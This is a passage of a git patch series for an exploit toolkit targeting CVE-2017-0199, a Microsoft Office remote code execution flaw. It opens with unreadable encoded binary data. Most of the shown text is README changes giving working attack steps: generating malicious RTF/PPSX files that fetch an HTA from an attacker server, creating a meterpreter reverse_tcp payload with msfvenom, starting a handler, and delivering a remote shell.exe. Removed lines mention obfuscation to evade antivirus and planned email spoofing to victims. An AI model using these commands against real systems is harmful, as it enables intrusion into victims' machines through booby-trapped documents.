
zdaSw~?dnpt;WOPmuK@~BcP4YCcnGV3BSqbQsbHs39UA~=Y%Jt^VG_YYTAGezss>g! zdX(YQvij4{2zmPNGH{;D1p~$}@TYwnr9qz zd6pRUnhx$GD<7A88zupRq|FCIs|-PSO$z9ONfZWlgGzpSaKp$#AJrcUTwh{$hA)+e zh%K!J^6gFDf&0ql2@3RvQSG=wGv^iZY3GFm@iM&ZjL4$WdCB50H#l95HpB~< zE8?1EJ)hy3`Eq6*I5Q(arcQfZ)b*52;0!%Eyj!~OYJQxSJ;pxwRtyB+MYjHs{;y8} z96Hvg5O>eek-Kdf_bp$_SXK*xBqIfM?RiN3-^;uJQTM*4coh8G{86)!JHd z_p?7a6ZqG`M7nO;5^}6sOE-n&FP4+n6>j4sxHF|EFmz2&h^yN`Wbz3Az*pzgW9g-^ z6aNrUAWdFlh%u_S6^Is}jxWW5kD^5Aos0oUQ3>!*aXB>Z!HO-@I>j!yl`+0>$QZFx z9(Nnz5=&ig%nh{6!&K`Qu0svqe8pz#CQCTO>?HK4=KdQH5Ks_I5CqYsRd0}S zQ19HQ?T?R-Tln{)eUDpUx>H>KtA#&H_&sjIQw_4w=YMJ9@hG4H6`%W~7a%pBgLh`w zznb`KDLUYx1g+gU;=QphX=ySov!px!oNxi0G|$AS>fUInmghB zf2gwn3;-@-@Bj$8E1L2X@RyPXz^4Oe)qgmh6aCle|67iIU=nbC^#_tOCJ^b@eGQbe z|Nb@yh63j;e}Fn*{el8#F$X39r$K!nm=gXXJQBqHds0+j9B|UZ2iySZ|AD&~n*sBH zGp;@GQYrrr-u;pSm4BGhr-}RdbNJu7doP6o#sO!PdBABh{ypwqSpxvXvIkt6;NRo!RT;oI z;0-wsxB`*C$K8t@fN{X;_Xk|CrM^Uv2E`Q>ksA4HzNkJga?E%fhQ^EaReUlzlkw(Y-1p&nbFv-*$7k7H7g ztxvvvcwwYF>l46WDUSH)__G6lHuLWe)5p!cH~C95k1qXTws_oPN74<%&lbylPP~4$ z_~#LL$bcP;4?{L>`m04?cOx(Xc!Byrn0@<;@atm#<8l=k2E0~#fIYYV%gXJg6a?hY RFDdT+n&Ch|1Z{qP`X6c+;vfJ3 literal 0 HcmV?d00001 From 25ff7f5fe167cc64653b575ff17fe0cf7fd8bfc1 Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 14:04:28 +0400 Subject: [PATCH 4/8] Delete 1.txt --- template/1.txt | 1 - 1 file changed, 1 deletion(-) delete mode 100644 template/1.txt diff --git a/template/1.txt b/template/1.txt deleted file mode 100644 index d00491f..0000000 --- a/template/1.txt +++ /dev/null @@ -1 +0,0 @@ -1 From d3ac90a9d779a74c841f112348e0cf6ebc3ade4c Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 15:34:21 +0400 Subject: [PATCH 5/8] Update README.md --- README.md | 42 +++++++++++++----------------------------- 1 file changed, 13 insertions(+), 29 deletions(-) diff --git a/README.md b/README.md index 79196b6..605be24 100644 --- a/README.md +++ b/README.md 
@@ -1,43 +1,25 @@ -## Exploit toolkit CVE-2017-0199 - v3.0 +## Exploit toolkit CVE-2017-0199 - v4.0 -Exploit toolkit CVE-2017-0199 - v3.0 is a handy python script which provides pentesters and security researchers a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious (Obfuscated) RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration. - -### Video tutorial (for v2.0) - -https://youtu.be/42LjG7bAvpg +Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration. ### Release note: Introduced following capabilities to the script - - Generate Malicious Obfuscated RTF file ( using -x option ) to bypass AV -##### Detection rate before obfuscation - -![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v2.0-beta-3/Invoice_Normal.jpeg) -##### Detection rate after obfuscation: -![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v2.0-beta-3/Invoice_Obfuscated.jpeg) - - - Deliver custom HTA file ( using -H option ) - - Deliver remote payload + - Generate Malicious PPSX file + - Exploitation mode for generated PPSX file Version: Python version 2.7.13 -### Future release: - -Working on following feature - - - Automatically send generated malicious RTF to victim using email spoofing - - ### Scenario 1: Deliver local payload ###### Example commands 1) Generate malicious RTF file - # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 + # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc 2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 
-f exe > /tmp/shell.exe # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run" 3) Start toolkit in exploit mode to deliver local payload - # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe + # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe ###### Sequence diagram ![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario1.jpg) @@ -46,9 +28,9 @@ Working on following feature ### Scenario 2: Deliver Remote payload ###### Example commands 1) Generate malicious RTF file - # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 + # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc 2) Start toolkit in exploit mode to deliver remote payload - # python cve-2017-0199_toolkit.py -M exp -e http://remoteserver.com/shell.exe + # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe ###### Sequence diagram ![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario2.jpg) @@ -57,9 +39,9 @@ Working on following feature ### Scenario 3: Deliver custom HTA file ###### Example commands 1) Generate malicious RTF file - # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 + # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 2) Start toolkit in exploit mode to deliver custom HTA file - # python cve-2017-0199_toolkit.py -M exp -H /tmp/custom.hta + # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta ###### Sequence diagram ![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario3.jpg) 
@@ -81,6 +63,7 @@ Working on following feature -u The path to an hta file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file. + -t RTF|PPSX (default = RTF) Type of the file to be generated.\n" -x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable. @@ -88,6 +71,7 @@ Working on following feature Exploitation: + -t RTF|PPSX (default = RTF) Type of file to be exolited.\n" -H Local path of a custom HTA file which needs to be delivered and executed on target. NOTE: This option will not deliver payloads specified through options "-e" and "-l" @@ -104,7 +88,7 @@ This program is for Educational purpose ONLY. Do not use it without permission. ### Credit -@nixawk for RTF sample, @bhdresh +@nixawk for RTF sample, @Li Haifei, @bhdresh ### Bug, issues, feature requests From d840cdedaf2222ee2b13744d99317099daf16e81 Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 15:36:45 +0400 Subject: [PATCH 6/8] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 605be24..874c5c9 100644 --- a/README.md +++ b/README.md @@ -63,7 +63,7 @@ Version: Python version 2.7.13 -u The path to an hta file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file. - -t RTF|PPSX (default = RTF) Type of the file to be generated.\n" + -t RTF|PPSX (default = RTF) Type of the file to be generated.\n" -x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable. 
@@ -71,7 +71,7 @@ Version: Python version 2.7.13 Exploitation: - -t RTF|PPSX (default = RTF) Type of file to be exolited.\n" + -t RTF|PPSX (default = RTF) Type of file to be exolited.\n" -H Local path of a custom HTA file which needs to be delivered and executed on target. NOTE: This option will not deliver payloads specified through options "-e" and "-l" From d0c26bc2aa38be01df01b62d4b586c6ebe797dc5 Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 15:37:36 +0400 Subject: [PATCH 7/8] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 874c5c9..dbd4675 100644 --- a/README.md +++ b/README.md @@ -63,7 +63,7 @@ Version: Python version 2.7.13 -u The path to an hta file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file. - -t RTF|PPSX (default = RTF) Type of the file to be generated.\n" + -t RTF|PPSX (default = RTF) Type of the file to be generated. -x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable. @@ -71,7 +71,7 @@ Version: Python version 2.7.13 Exploitation: - -t RTF|PPSX (default = RTF) Type of file to be exolited.\n" + -t RTF|PPSX (default = RTF) Type of file to be exolited. -H Local path of a custom HTA file which needs to be delivered and executed on target. NOTE: This option will not deliver payloads specified through options "-e" and "-l" From 3ca62ca7cfc479467b9acf65c71ceb4e9c33dada Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 15:38:26 +0400 Subject: [PATCH 8/8] Update TODO.txt --- TODO.txt | 1 - 1 file changed, 1 deletion(-) diff --git a/TODO.txt b/TODO.txt index 6d1c5ed..0c5279d 100644 --- a/TODO.txt +++ b/TODO.txt @@ -1,2 +1 @@ ### Future release: -* Automatically send generated malicious RTF to victim using email spoofing